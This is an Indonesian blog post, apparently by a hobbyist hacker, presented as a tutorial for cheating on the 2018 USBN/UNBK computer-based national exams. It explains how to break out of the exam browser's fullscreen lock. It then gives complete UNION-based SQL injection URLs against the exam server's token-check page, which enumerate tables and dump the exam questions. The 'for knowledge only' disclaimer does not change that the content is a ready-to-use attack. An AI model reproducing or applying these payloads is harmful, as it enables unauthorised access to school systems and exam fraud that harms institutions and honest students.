Update, Cara Hack Cbt Usbn Atau Unbk 2018
Hallo teman" anonymbug pemburu põrnikas di dunia maya:v
Hari ini saya ingin sharing tentang bagaimana cara hack usbn atau unbk 2018
Wih apa bisa unbk di hack?
haha (No System Is Safe) tentu bisa karena saya sendiri yang membuktikanya wkwk WHOAMI heker mank:v
Di bawah ini saya akan jelaskan cara menbobol usbn atau unbk
Peringatan:
Jangan di salah gunakan ya:v nanti bisa" kalian di Cyduk wiuwiuwiu:v
Pertama Jalankan exambrowser
disini kalian jangan login dulu kita harus keluar dari kurungan fullscreen:v
caranya adalah menekan Shift+Esc atau Ctrl/Alt/Del berikut tampilanya:
Kita bisa meihat taskbar selanjutnya kita unopen dulu google chrome lalu buka kembali supaya tampilan google chrome normal seperti biasa
lalu masukan alamat ip http://192.168.0.200 otomatis di redirect http://192.168.0.200/cbt
Pilihlah soal yang akan kalian kerjakan.
disini kalian disuruh memasukan token
nah disinilah saya menemukan põrnikas sql injection
kalau belum tau apa itu sql injection Belajar disini
jika sudah paham langsung kita praktekan.
Disini kita sudah melihat urlnya, tambahkan tanda petik (') di akhir url, dan munculah mysql error,
untuk gambarnya lupa saya SS.Selanjutnya kita mencari jumlah tabel dengan perintah
http://192.168.0.200/cbt/cektoken?kd=06_BJAWA'order+by+8--+ (error)
Sampai tampilanya tidak error
http://192.168.0.200/cbt/cektoken?kd=06_BJAWA'order+by+7--+ (tidak error)
Nah perintah di atas tidak mistake berarti jumlah tabelnya ada 7
Selanjutnya kita mencari põrnikas dari nomor ajaib:v dengan perintah
http://192.168.0.200/cbt/cektoken?kd=06_BJAWA'union+select+1,2,3,4,5,6,7--+
Nah nomor ajaibnya sudah muncul.
dari nomor itu kita bisa menampilkan isi database
http://192.168.0.200/cbt/cektoken?kd=06_BJAWA'union+select+1,2,group_concat(table_name),4,5,6,7+from+information_schema.tables+where+table_schema=database()--+
Disini nama" tabel sudah terlihat dan saya akan membuka isi dari tabel jawaban
http://192.168.0.200/cbt/cektoken?kd=06_BJAWA'union+select+1,2,group_concat(column_name),4,5,6,7+from+information_schema.columns+where+table_name=CHAR(106, 97, 119, 97, 98, 97, 110)--+
Perlu di ingat ketika mengeksekusi tabel jawaban, harus di konfersi ke desimal dulu
CHAR(konfersi desimal dari tabel jawaban) seperti ini CHAR(106, 97, 119, 97, 98, 97, 110)
dan terakhir saya akan membuka isi dari kolom "question" dimana kita bisa melihat soal" usbn atau unbk disini saya menampilkan soal ipa saja dengan perintah
http://192.168.0.200/cbt/cektoken?kd=06_BJAWA'union+select+1,2,group_concat(question),4,5,6,7+from+jawaban+where+kode_soal='06_IPA'--+
Dan selamat kita telah meretas unbk
Catatan: Walaupun begitu harus tetap belajar ya sob untuk masa depan anda, mulailah belajar dari sekarang jika anda merasa malas? baca tips ini untuk meningkatkan semangat belajar. tutorial diatas hanya untuk pengetahuan saja terimakasih.
Comments
Post a Comment